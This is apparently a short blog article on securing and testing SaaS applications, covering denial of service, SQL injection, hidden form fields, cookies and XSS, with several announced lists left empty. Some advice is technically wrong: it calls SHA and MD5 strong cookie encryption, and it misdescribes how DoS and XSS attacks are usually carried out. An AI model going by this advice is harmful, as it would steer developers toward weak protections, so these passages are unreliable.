Securing the cloud-based apps
Organizations use different cloud services like SaaS, IaaS, and PaaS with private, public, or hybrid deployment models. It is equally important to provide security for the applications hosted on all the different services offered. Cloud Computing Security or simply Cloud Security involves securing a network, information, and application security in the cloud environment.
The most significant threat / risk associated with cloud computing technology is data loss. Although transforming to cloud computing is fast, important business-level security policies, practices, and processes have to be followed and implemented to avoid severe data breaches.
Security challenges with SaaS:
Most of the organizations are adapting to the latest technologies on cloud. As a result of that, a new window of challenges has opened for them:
Security testing for SaaS:
Due to the increase in the use of Cloud Computing technology, security testers have to ensure the security of SaaS applications. The complexity of implementing SaaS leads to continuous Security testing at frequent intervals as ’one-time’ testing doesn’t suffice.
Security testing of SaaS offerings should ensure the following but not limit to:
Following are the major security litmus tests performed for SaaS:
Denial of Service (DOS):
DOS occurs when the attacker intentionally brings down the deployment servers or networks by simulating huge traffic. This is usually done by man-in-the-middle attack with IP-spoofing. Hence, to mitigate this, we implement proper access mechanisms.
Attackers inject bad SQL queries into input fields of the application to acquire sensitive information. Best practice for this is filtering / validating the input data.
Hidden Form Parameters:
We avoid using hidden form fields in SaaS-hosted applications as the hidden form parameters are a big threat to data integrity.
Cookies should be properly encrypted with strong encryption methodologies like SHA / MD5. We must cookie-test manually apart from automatic vulnerability scanning.
Since a SaaS application is shared across different users, Cross Site Scripting (XSS) attacks are the most prominent type of attacks that the attackers use. This attack is usually done using phishing attacks. Automated Vulnerability scan of the application would be the better technique for this type of attacks.
Best practices for SaaS Security: